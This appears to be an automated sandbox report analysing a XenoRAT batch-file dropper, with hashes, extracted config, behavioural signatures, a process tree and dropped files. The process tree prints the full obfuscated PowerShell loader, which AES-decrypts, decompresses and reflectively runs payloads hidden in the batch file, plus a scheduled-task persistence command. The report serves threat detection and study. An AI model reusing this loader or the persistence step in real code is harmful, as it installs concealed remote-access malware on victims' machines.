Analysis
-
max time kernel
30s -
max time network
11s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
12-06-2024 22:23
Static task
static1
Behavioral task
behavioral1
Sample
sdsd.bat
Resource
win7-20240611-en
General
-
Target
sdsd.bat
-
Size
399KB
-
MD5
dedc70c320233bc67ceb02a9492f29d6
-
SHA1
d031a05a302501a50581a2338762013f60da62df
-
SHA256
c1836c0d56c8ec60cee58783c67c900f170d854e60f856c1a5b9e001894c8e1a
-
SHA512
776e753db2a34143981814c44fb0e8bdfa78b38d186ce9e794cd927f28408397460f302d63d731f4c6794cd745164211370b9db7b47b4884d01c5f76f066f93e
-
SSDEEP
6144:QpmLNVyxXtQ5MtZl5HaSAcfGoPTT5rYwZVYVwmmkcPW0oLCol6w1w/apK0/X0DC:Qga9t8Mt/HA4T9be9mfu0oZ6ziD/EG
Malware Config
Extracted
xenorat
127.0.0.1
-
delay
5000
-
install_path
temp
-
port
7788
-
startup_name
lol
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
sdsd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation sdsd.exe -
Executes dropped EXE 2 IoCs
Processes:
sdsd.exesdsd.exepid process 1668 sdsd.exe 4796 sdsd.exe -
Drops file in System32 directory 1 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\lol svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 7 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1 svchost.exe Key created \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PCT = "133627046440725541" svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\HAM\AUI\App\V1\LU\PTT = "133627046519666538" svchost.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
powershell.exepid process 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe 2032 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeExplorer.EXEsvchost.exedescription pid process Token: SeDebugPrivilege 2032 powershell.exe Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeShutdownPrivilege 3428 Explorer.EXE Token: SeCreatePagefilePrivilege 3428 Explorer.EXE Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe Token: SeManageVolumePrivilege 2580 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2580 svchost.exe Token: SeIncreaseQuotaPrivilege 2580 svchost.exe Token: SeSecurityPrivilege 2580 svchost.exe Token: SeTakeOwnershipPrivilege 2580 svchost.exe Token: SeLoadDriverPrivilege 2580 svchost.exe Token: SeSystemtimePrivilege 2580 svchost.exe Token: SeBackupPrivilege 2580 svchost.exe Token: SeRestorePrivilege 2580 svchost.exe Token: SeShutdownPrivilege 2580 svchost.exe Token: SeSystemEnvironmentPrivilege 2580 svchost.exe Token: SeUndockPrivilege 2580 svchost.exe -
Suspicious use of WriteProcessMemory 63 IoCs
Processes:
cmd.exepowershell.exesdsd.exesdsd.exesvchost.exedescription pid process target process PID 1048 wrote to memory of 5040 1048 cmd.exe cmd.exe PID 1048 wrote to memory of 5040 1048 cmd.exe cmd.exe PID 1048 wrote to memory of 2032 1048 cmd.exe powershell.exe PID 1048 wrote to memory of 2032 1048 cmd.exe powershell.exe PID 2032 wrote to memory of 3428 2032 powershell.exe Explorer.EXE PID 2032 wrote to memory of 1120 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2556 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 968 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 4512 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 964 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2300 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1736 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2320 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1460 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 3300 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1920 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1520 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1604 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1908 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 916 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1704 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1304 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1696 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1096 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 4440 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2068 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 3840 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1076 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1468 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 3036 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1848 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 948 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1644 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1840 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2428 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 408 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 60 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 3604 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1828 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1232 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2608 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1620 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1220 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 792 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 4948 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 4372 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2188 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2580 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2772 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1392 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2112 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 2564 2032 powershell.exe svchost.exe PID 2032 wrote to memory of 1668 2032 powershell.exe sdsd.exe PID 2032 wrote to memory of 1668 2032 powershell.exe sdsd.exe PID 2032 wrote to memory of 1668 2032 powershell.exe sdsd.exe PID 1668 wrote to memory of 4796 1668 sdsd.exe sdsd.exe PID 1668 wrote to memory of 4796 1668 sdsd.exe sdsd.exe PID 1668 wrote to memory of 4796 1668 sdsd.exe sdsd.exe PID 4796 wrote to memory of 404 4796 sdsd.exe schtasks.exe PID 4796 wrote to memory of 404 4796 sdsd.exe schtasks.exe PID 4796 wrote to memory of 404 4796 sdsd.exe schtasks.exe PID 792 wrote to memory of 448 792 svchost.exe wmiprvse.exe PID 792 wrote to memory of 448 792 svchost.exe wmiprvse.exe
Processes
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sdsd.bat"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uE03OF756EwHDsXZZ4dW1daMDjFkoEm1g+uRel3+taQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OQwUXKYXuHYJURyKYIwNjA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $okmXp=New-Object System.IO.MemoryStream(,$param_var); $xIYUl=New-Object System.IO.MemoryStream; $muRJA=New-Object System.IO.Compression.GZipStream($okmXp, [IO.Compression.CompressionMode]::Decompress); $muRJA.CopyTo($xIYUl); $muRJA.Dispose(); $okmXp.Dispose(); $xIYUl.Dispose(); $xIYUl.ToArray();}function execute_function($param_var,$param2_var){ $BISrT=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DWUga=$BISrT.EntryPoint; $DWUga.Invoke($null, $param2_var);}$kcqDb = 'C:\Users\Admin\AppData\Local\Temp\sdsd.bat';$host.UI.RawUI.WindowTitle = $kcqDb;$qjwUw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($kcqDb).Split([Environment]::NewLine);foreach ($BKyFZ in $qjwUw) { if ($BKyFZ.StartsWith('mfixKLpOscLidzGbRQVv')) { $QJzdJ=$BKyFZ.Substring(20); break; }}$payloads_var=[string[]]$QJzdJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\sdsd.exe"C:\Users\Admin\AppData\Local\Temp\sdsd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"C:\Users\Admin\AppData\Local\Temp\XenoManager\sdsd.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /Create /TN "lol" /XML "C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmp" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3884,i,7977653611488681184,6839495125838449898,262144 --variations-seed-version --mojo-platform-channel-handle=4448 /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sdsd.exe.logFilesize
226B
MD5916851e072fbabc4796d8916c5131092
SHA1d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA2567e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA51207ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nttybbfr.51g.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\sdsd.exeFilesize
45KB
MD541146957ad1a37a26565c42ac174609a
SHA1622b3cd22edd11ba59ec438e14fe96d0c03d5026
SHA256320b867ae9cbb01c732fab179a66d1c63ea3498f6dae49e4d1cfcb5d5e0cb1fc
SHA512d763fd0086ec0e6fbd0b2d73ed86ff6e08079fc3651e83e91c0ab198189d313db2b2ace8d72c55178d463647eeb8cafa1a511cbf2bc366959f3fea9be0b9079d
-
C:\Users\Admin\AppData\Local\Temp\tmp9DE.tmpFilesize
1KB
MD59ec91e3fb824c95fd8118ef24669988a
SHA15b6fe95c2a51b7ef0970c3b24844ece400e677ea
SHA25645d3489cde25df745a4f071d83d83fc6d9daddc03b3a680a5c3010e844ae38f5
SHA512b898e3d16d77d672b7f5d2c32ff2a5fbc6f71d1be5ed12c2981cabd4ef90315b36512335a15d2c3cbe0bb24539b6ccd37ea1771521f9487f2d915c148fc02fc2
-
memory/60-76-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/948-68-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1120-70-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1232-77-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1460-73-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1520-74-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1644-83-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1668-126-0x0000000000140000-0x0000000000152000-memory.dmpFilesize
72KB
-
memory/1704-80-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/1736-72-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/2032-14-0x00000208B2AA0000-0x00000208B2B16000-memory.dmpFilesize
472KB
-
memory/2032-142-0x00007FFD5EE93000-0x00007FFD5EE94000-memory.dmpFilesize
4KB
-
memory/2032-0-0x00007FFD53903000-0x00007FFD53905000-memory.dmpFilesize
8KB
-
memory/2032-143-0x00007FFD53900000-0x00007FFD543C1000-memory.dmpFilesize
10.8MB
-
memory/2032-19-0x00000208B29A0000-0x00000208B29B2000-memory.dmpFilesize
72KB
-
memory/2032-15-0x00000208983D0000-0x00000208983D8000-memory.dmpFilesize
32KB
-
memory/2032-13-0x00000208B29D0000-0x00000208B2A14000-memory.dmpFilesize
272KB
-
memory/2032-16-0x00000208B2A20000-0x00000208B2A74000-memory.dmpFilesize
336KB
-
memory/2032-12-0x00007FFD53900000-0x00007FFD543C1000-memory.dmpFilesize
10.8MB
-
memory/2032-11-0x00007FFD53900000-0x00007FFD543C1000-memory.dmpFilesize
10.8MB
-
memory/2032-10-0x0000020898460000-0x0000020898482000-memory.dmpFilesize
136KB
-
memory/2068-81-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/2428-82-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/2556-79-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/3428-69-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/3428-20-0x0000000002CF0000-0x0000000002D1A000-memory.dmpFilesize
168KB
-
memory/3604-78-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/4440-75-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB
-
memory/4512-71-0x00007FFD326F0000-0x00007FFD32700000-memory.dmpFilesize
64KB